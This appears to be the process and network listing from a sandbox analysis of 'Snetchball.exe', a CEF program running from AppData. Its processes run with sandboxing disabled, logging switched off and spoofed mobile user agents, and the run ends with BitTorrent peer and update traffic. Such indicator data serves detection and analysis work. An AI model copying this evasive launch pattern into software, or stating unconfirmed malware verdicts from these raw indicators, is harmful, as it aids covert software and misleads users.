"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3368 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4292 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2964 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4200 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3876 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1820 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2372

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5436 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4760 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

\??\E:\setup.exe

"E:\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp" /SL5="$50410,3687301,168448,E:\setup.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004CC

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1044

F:\Games\The Longing\The Longing.exe

"F:\Games\The Longing\The Longing.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

F:\Games\The Longing\The Longing.exe

"F:\Games\The Longing\The Longing.exe"

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5064 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2388

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc731cc40,0x7fffc731cc4c,0x7fffc731cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3076,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3300,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3836,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3876 /prefetch:2

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3556,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3536 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4400,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4356,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3232,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3256,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4736,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5104,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3372,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3396,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3380,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:8

C:\Users\Admin\Downloads\SteamSetup.exe

"C:\Users\Admin\Downloads\SteamSetup.exe"

C:\Program Files (x86)\Steam\bin\steamservice.exe

"C:\Program Files (x86)\Steam\bin\steamservice.exe" /Install

C:\Program Files (x86)\Steam\steam.exe

"C:\Program Files (x86)\Steam\steam.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 i-6000.b-47142.ut.bench.utorrent.com udp
US 54.167.59.98:80 i-21.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 98.59.167.54.in-addr.arpa udp
US 67.215.246.203:80 update.utorrent.com tcp
US 3.214.87.95:80 i-21.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-21.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-21.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
IS 82.221.103.245:80 update.utorrent.li tcp
N/A 10.127.0.1:5351 udp
US 98.143.146.7:80 legacy.utorrent.com tcp
GB 87.248.205.1:80 apps.bittorrent.com tcp
US 34.192.104.143:80 i-21.b-47142.ut.bench.utorrent.com tcp
US 98.143.146.7:80 legacy.utorrent.com tcp
IS 82.221.103.244:6881 router.utorrent.com udp
US 67.215.246.10:6881 router.bittorrent.com udp
US 8.8.8.8:53 143.104.192.34.in-addr.arpa udp
US 8.8.8.8:53 244.103.221.82.in-addr.arpa udp
US 8.8.8.8:53 10.246.215.67.in-addr.arpa udp
BR 187.123.3.105:9148 udp
US 72.220.104.94:43077 udp
RU 95.26.230.139:28371 udp
BR 177.124.5.86:16418 udp
AT 84.115.236.46:54641 udp
ES 46.6.63.190:12898 udp
KR 119.56.238.115:32692 udp
US 173.254.195.58:80 update.bittorrent.com tcp
JP 180.197.61.30:51413 udp
IT 37.116.197.74:6881 udp
CH 84.16.75.227:6881 udp
SE 2.249.115.125:27260 udp
UA 37.57.95.1:53008 udp
JP 125.30.146.12:30388 udp
PT 89.114.98.205:6881 udp
FR 62.210.74.109:5870 udp
KZ 213.232.201.126:32000 udp
BR 131.108.15.138:36768 udp
RU 31.135.50.4:2821 udp
AT 83.215.126.78:50321 udp
MX 177.248.139.157:41165 udp
KR 1.233.76.216:7469 udp
US 34.192.104.143:80 i-49.b-47142.ut.bench.utorrent.com tcp
BR 187.106.100.49:46165 udp
NL 88.151.32.222:62161 udp
US 3.214.87.95:80 i-49.b-47142.ut.bench.utorrent.com tcp
